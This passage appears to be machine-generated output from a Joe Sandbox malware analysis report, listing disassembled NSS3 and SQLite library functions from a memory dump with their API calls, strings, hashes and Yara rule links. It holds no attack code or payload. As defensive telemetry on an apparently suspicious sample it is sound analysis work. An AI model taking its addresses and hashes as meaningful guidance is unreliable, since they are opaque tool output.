                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C80AE3D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6C80A6D8), ref: 6C80AE47
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2b6a5fee792f0fc7e2161484889d2b56b73510590f5b51643ce801de0a130fc8
                                                                                                                                                                                                                                                                                          • Instruction ID: c760bd95244b74f44ed1bb0a174e7a0ad37b5199f96ef2479ed2d99fc551e093
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6a5fee792f0fc7e2161484889d2b56b73510590f5b51643ce801de0a130fc8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F096B6201A01A7CA20EF69D808957777CBF867BDB144738E52A83941D731E119C7D5
                                                                                                                                                                                                                                                                                          Function 6C697C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C697D35
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 5367c4aab7dd34f0362f7621463f1429c54f197591069d1c935a774d591888db
                                                                                                                                                                                                                                                                                          • Instruction ID: 48d1942cb78a007b5a6c8075976ec43debaf66e3a0ff531ba35dd2f6f2a20692
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5367c4aab7dd34f0362f7621463f1429c54f197591069d1c935a774d591888db
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87312671E0423A9BC710CF9EC9809BEB7F1EF88709B590596E448B7B95D271E841C7E8
                                                                                                                                                                                                                                                                                          Function 6C686C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C686D36
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C686D2F
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C686D20
                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C686D2A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 94d1a7b9bd57b631b8d5a001e9ffaf548aaef974ef9b1d46ce7dc912a5453b93
                                                                                                                                                                                                                                                                                          • Instruction ID: a62224de9b501b629304f84b390399b13aa06d355c00d1ef0645570087935b06
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94d1a7b9bd57b631b8d5a001e9ffaf548aaef974ef9b1d46ce7dc912a5453b93
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 092121306203049BC320CF19C841B9AB7F2AF85318F24892CD8499BF51E371F948C7BA
                                                                                                                                                                                                                                                                                          Function 6C762FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+vl,6C7632C2,<+vl,00000000,00000000,?), ref: 6C762FDA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C76300B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C76302A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7508B4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C73C45D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73C3D0: TlsGetValue.KERNEL32 ref: 6C73C494
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C73C4A9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73C3D0: PR_Unlock.NSS3(?), ref: 6C73C4F4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                                                                                                                                                                                          • String ID: <+vl
                                                                                                                                                                                                                                                                                          • API String ID: 2538134263-2462106119
                                                                                                                                                                                                                                                                                          • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                          • Instruction ID: 3e9dc34250bddbbc05b955f5aaaf716241c356ae32778902c283f96aa56b06ff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211E7B6B001046BDB008E65DE08A9B77DA9B8436DF184134EC1CD7B81EB72ED19C7A1
                                                                                                                                                                                                                                                                                          Function 6C7BCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7BCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7BCC7B), ref: 6C7BCD7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7BCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7BCD8E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7BCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7BCDA5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7BCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7BCDB8
                                                                                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C7BCCB5
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C8514F4,6C8502AC,00000090), ref: 6C7BCCD3
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C851588,6C8502AC,00000090), ref: 6C7BCD2B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D9AC0: socket.WSOCK32(?,00000017,6C6D99BE), ref: 6C6D9AE6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6D99BE), ref: 6C6D9AFC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0590: closesocket.WSOCK32(6C6D9A8F,?,?,6C6D9A8F,00000000), ref: 6C6E0597
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                          • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                          • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                          • Opcode ID: 3b25d7e450eb9e47845a68364270e87c49089cdca7fede8e1ec0469b523adb97
                                                                                                                                                                                                                                                                                          • Instruction ID: 0b6b8ec62ffd993ce45cc6782027425d38cd79d57e9bf9fb4167c9d94715fe02
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b25d7e450eb9e47845a68364270e87c49089cdca7fede8e1ec0469b523adb97
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B11AFF2B002409EDBB09F598E06B433AB8934630DFD41839E5168BB45E7F8D808CBD5
                                                                                                                                                                                                                                                                                          Function 6C721CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_Initialize), ref: 6C721CD8
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C721CF1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_Now.NSS3 ref: 6C800A22
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C800A35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C800A66
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_GetCurrentThread.NSS3 ref: 6C800A70
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C800A9D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C800AC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_vsmprintf.NSS3(?,?), ref: 6C800AE8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: EnterCriticalSection.KERNEL32(?), ref: 6C800B19
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C800B48
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C800C76
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_LogFlush.NSS3 ref: 6C800C7E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                                                                                                                                                                                                                          • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                                                                                                                                                                                                                          • API String ID: 1907330108-3943720641
                                                                                                                                                                                                                                                                                          • Opcode ID: 0c8363aad93f9cf88d93854a609f3fd03bcff5cbfce5ccdb96bd9997231bcc48
                                                                                                                                                                                                                                                                                          • Instruction ID: f231130094ae1daaad344b0d9cf586225b9b53ba4b95ced1fb908c6b5502d4e1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c8363aad93f9cf88d93854a609f3fd03bcff5cbfce5ccdb96bd9997231bcc48
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81018039302140DFDBA09F54DA4DB5633B5ABC231EF844436E80992611DF7DEC89C6D1
                                                                                                                                                                                                                                                                                          Function 6C687F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C6881DF
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C688239
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C688255
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C688260
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavememcpysqlite3_free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1525636458-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4ad8caca04a38556d57a76b3099b70c1e47f121fd9a7e3485233645850516ac6
                                                                                                                                                                                                                                                                                          • Instruction ID: baae7eb4f6e1afb63f7222985c2bf48bfd1779602b2e8ce0d608144a295a3740
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad8caca04a38556d57a76b3099b70c1e47f121fd9a7e3485233645850516ac6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC91DC31A02208CBEB54DFE0D8487EDB7B1BF4A30DF64403AD41A9B660DB799855CBE5
                                                                                                                                                                                                                                                                                          Function 6C761D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C761D8F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C761DA6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C761E13
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C761ED0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 84796498-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d40f08e1a7087b62041d9b35a1bce27483ea7f25c59e9b587e044ac98eccda9b
                                                                                                                                                                                                                                                                                          • Instruction ID: 4d9c27e1c40ab8ff79406086a9e740b70fb9fe64182b47fe7f36f8cab77aa112
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d40f08e1a7087b62041d9b35a1bce27483ea7f25c59e9b587e044ac98eccda9b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9516A75A00309CFDB10CF99C988BAEB7BABF49309F148129E8199BB51D771E945CB90
                                                                                                                                                                                                                                                                                          Function 6C7B4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C6985D2,00000000,?,?), ref: 6C7B4FFD
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B500C
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B50C8
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B50D6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
